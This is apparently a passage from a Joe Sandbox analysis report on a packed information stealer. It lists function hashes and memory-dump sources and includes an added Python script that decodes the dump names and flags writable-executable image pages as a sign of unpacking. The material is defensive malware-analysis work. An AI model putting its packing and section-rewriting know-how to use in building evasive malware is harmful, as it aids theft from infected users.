                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                  • Instruction ID: d2a4b3ca6f1f1546d29edd3dd17a591321faec88f0bd632dee0eb54205a88177
                                  • Opcode Fuzzy Hash: 0415d5d4d33c4cbc98ebcd4e02f38613755f15d71f03d46d3ad1f802428a958c
                                  • Instruction Fuzzy Hash: 1CC15D76E29B814BD713873DD802265F395EFE7294F19D72FFCE472A42EB2096824244
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                  • Instruction ID: ade2f9d12a8abc4d4363a1a98931850211c3cb553e2bae71ec7cf229f1bb72e8
                                  • Opcode Fuzzy Hash: c0286d93f7a31adb6e0512f384a6ffdbec22691d5e454412bf14d045daf76b76
                                  • Instruction Fuzzy Hash: 0EB11436E042A99FCB21CB64C790BEEBFB2AF52304F19915ED4447B282DB354D82C791
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                  • Instruction ID: f4392e74ccb97f408a640fca83c244ae89110875f4d3d52221ecb1fa6d020d33
                                  • Opcode Fuzzy Hash: a1bf99ec60eeecf1be959f5a4ef1b966c18603a01db15cb0710963bbc3f2451f
                                  • Instruction Fuzzy Hash: 09D15770600B44CFD721CF29C581BA7B7E0BB49308F18992ED89B9BB51D736E846CB91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                  • Instruction ID: 2414a633d1e9b1f6a69c6784009a6fd439c942621737cb76ad311fadc2c8778f
                                  • Opcode Fuzzy Hash: d0dcbab18ec4284ec34a5c32407e6b7425f473321a9dde194cdbbc869946cebb
                                  • Instruction Fuzzy Hash: 55D15DB010C3808FD7158F11C4A43ABBFE0AF95708F18995EE4D92B391D3BA8908DF92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                  • Instruction ID: fc8aa00060bed8a8d35c6ee5f2e6e3196c5ae05ad2e37a7372c2447d29a82366
                                  • Opcode Fuzzy Hash: 8c42632ac257159b6d5ab4821e07f9a6543e16090cbe3aac95ea3addfbaf7a13
                                  • Instruction Fuzzy Hash: 48B17172A083515BD308CF25C45175BF7E2EFCC310F1AC93EB89997291D778E9459A82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                  • Instruction ID: 6c76515e6bfaf6c5029703465f95fb1d76c235369bedd3810bfbc2021fa6177b
                                  • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                  • Instruction Fuzzy Hash: 33B1A272E083115BD708CF25C89175BF7E2EFC8310F1AC93EE89997291D774D9459A82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                  • Instruction ID: 547df04fc0c991598a0edf1e5e1d3281105d0a7d3414a63771657d9acfdbade5
                                  • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                  • Instruction Fuzzy Hash: 7EB12971A097119FDB06EE3DC481215F7E1AFE6380F50D72EE9A5B7662E731E8818740
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                  • Instruction ID: bb426a301c3af8d8f2781265e384c77bee4985e2e697e04b7da7a07cf1961fbf
                                  • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                  • Instruction Fuzzy Hash: 4D91A271B002158BDF15CE68DC80BBAB3A1EF65304F19656EEA14BB392D362DD07C7A1
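Each function record above lists the memory dumps (.sdmp files) the code was recovered from, and the dump name itself carries the region's base address and page protection. The following Python is an added example for this page, not Joe Sandbox code: it parses those names, maps the protection field onto the Windows PAGE_* constants, and flags MEM_IMAGE regions that are both writable and executable, which is what "Detected unpacking (changes PE section rights)" in the report's signature list refers to. The PAGE_* and MEM_IMAGE values are the documented winnt.h constants; the field layout of the .sdmp name (process, dump kind, dump id, base, protection, region type) is an assumption inferred from the names on this page, and fields 6 and 8 are carried but not interpreted. The sample excerpt is constructed from one record's Source File and Associated lines, kept verbatim including the "Download File" link label the page glues onto the extension.

```python
"""Decode the Joe Sandbox .sdmp memory-dump names listed under each function record."""
import re
from dataclasses import dataclass

# Windows page-protection and region-type constants from winnt.h (documented values).
PAGE_PROTECT_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_IMAGE = 0x1000000
EXECUTABLE_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITABLE_MASK = 0x04 | 0x08 | 0x40 | 0x80

# ASSUMED field layout, inferred from the names on the page (the report does not spell
# it out): <process>.<dump kind>.<dump id>.<region base>.<page protection>.<field 6>.
# <region type>.<field 8>.sdmp. Fields 6 and 8 are kept but not interpreted.
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<kind>[0-9a-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<field6>[0-9a-f]{8})\."
    r"(?P<mtype>[0-9a-f]{8})\.(?P<field8>[0-9a-f]{8})\.sdmp$", re.IGNORECASE)

# Loose pattern for pulling names out of report text, where the page glues the
# "Download File" link label directly onto the ".sdmp" extension.
SDMP_IN_TEXT_RE = re.compile(r"[0-9a-f]{8}(?:\.[0-9a-f]+){7}\.sdmp", re.IGNORECASE)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    proc: int
    base: int
    protect: int
    mtype: int

    @property
    def protect_name(self) -> str:
        # Mask off modifier bits such as PAGE_GUARD (0x100) before the lookup.
        return PAGE_PROTECT_NAMES.get(self.protect & 0xFF, hex(self.protect))

    @property
    def is_exec_writable(self) -> bool:
        return bool(self.protect & EXECUTABLE_MASK) and bool(self.protect & WRITABLE_MASK)

    def rva(self, image_base: int) -> int:
        """Offset of the region inside the loaded image (the report's 'Offset: 00E60000')."""
        return self.base - image_base


def parse_sdmp_name(name: str) -> DumpRegion:
    m = SDMP_RE.match(name.strip())
    if m is None:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    return DumpRegion(name=m.group(0), proc=int(m["proc"], 16), base=int(m["base"], 16),
                      protect=int(m["protect"], 16), mtype=int(m["mtype"], 16))


def regions_from_report(text: str) -> list:
    """Every distinct dump region named in a report excerpt, sorted by base address."""
    regions = {}
    for m in SDMP_IN_TEXT_RE.finditer(text):
        regions.setdefault(m.group(0), parse_sdmp_name(m.group(0)))
    return sorted(regions.values(), key=lambda r: r.base)


def image_base_from_report(text: str) -> int:
    """The 'Offset:' value on the Source File line is the module's load address."""
    m = re.search(r"Offset:\s*([0-9a-f]+)", text, re.IGNORECASE)
    if m is None:
        raise ValueError("no 'Offset:' field in excerpt")
    return int(m.group(1), 16)


def flag_rewritten_image_pages(regions) -> list:
    """MEM_IMAGE regions that are both writable and executable.

    A PE mapped by the loader normally gets execute+read code pages and read+write data
    pages, so write+execute image pages mean either the section headers asked for both
    or the process changed them at runtime (VirtualProtect). Both are what the report's
    "changes PE section rights" signature describes."""
    return [r for r in regions if r.mtype == MEM_IMAGE and r.is_exec_writable]


# Constructed excerpt: the Source File and Associated lines of one record on the page.
SAMPLE_EXCERPT = """\
Memory Dump Source
  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
"""

if __name__ == "__main__":
    base = image_base_from_report(SAMPLE_EXCERPT)
    for r in regions_from_report(SAMPLE_EXCERPT):
        flag = "W+X" if r.is_exec_writable else "   "
        print(f"{r.base:08X} rva=+{r.rva(base):06X} {r.protect_name:<24} {flag}")
```

Run against the excerpt, only the PE header page at 0xE60000 comes back as plain PAGE_READWRITE; the other fifteen regions of the image are PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY, which is the memory layout you expect from a packed sample that rewrites its own sections before the stealer code runs.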
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                  • Instruction ID: f126d26b59416eebb5c22600da7dc3c611e0602f4254579707a601023e8feae4
                                  • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                  • Instruction Fuzzy Hash: B6B15B316106489FD719CF29C48ABA47BE0FF45368F29965CE899DF2A3C336D981CB40
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                  • Instruction ID: 7f3d1f2a478cfdf7bd872245547f14913c5d2fac6c77af4db24669661aa2c1eb
                                  • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                  • Instruction Fuzzy Hash: 91C14A75A0471A8FC715DF28C08045AB3F2FF88354F258A6DE8999B721D731E9A6CF81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                   • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
